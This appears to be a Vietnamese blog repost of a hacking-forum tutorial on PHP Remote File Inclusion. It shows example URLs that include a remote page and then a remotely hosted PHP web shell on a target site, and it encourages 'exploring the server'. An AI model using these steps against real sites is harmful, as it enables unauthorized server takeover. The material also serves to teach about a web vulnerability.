Thứ Sáu, 7 tháng 2, 2014

RFI - Remote File Inclusion

nguồn:http://elitehackforums.com/showthread.php?tid=3117

RFI - Remote File Inclusion, takes advantage of include() & require() functions in PHP. Like its name says, this vulnerability lets us include files from remote servers onto the vulnerable page. This vulnerability was really great back in the day because shelling a server was a simple as hosting a shell on a remote server and then including it through $GET parameters in the URL of the vulnerable host. Being so great, masses were informed of the vulnerability and programmers made sure to end this vulnerability. This vulnerability rarely exists today, due to allow_url_include being disabled in modern/updated PHP versions.

[0x02] The Attack:


Say we have our site:

PHP Code:
http://www.site.com/stuff.php?page=stuff2.html 

* Okay so we can see that stuff.php is using the variable $page to get the html page to display to our browser (real life scenario wouldn't be this obvious lol )

* Okay so lets see if it will go ahead and pass a remote url.
PHP Code:
http://www.site.com/stuff.php?page=http://www.google.com 

If a successful remote file inclusion is there, you should see google's home page presented on the page in your browser. So with that said lets shell it with a php shell.

* Shelling:
This is simple, upload your favorite php shell to a remote server that allows php functions to be executed, then simply type in the url to your shell just like you did with google.com.
Quote:http://www.site.com/stuff.php?page=http:...yshell.php

* Now if all goes well you should see your shell interface on the page, Begin exploring the server and having fun.

[0x03] Conclusion:
Although RFI is quite dead, I thought it would be nice for some of the new comers just to learn and have under their belt. Never can say no to new knowledge.

Tuto by me ;)

Không có nhận xét nào:

Đăng nhận xét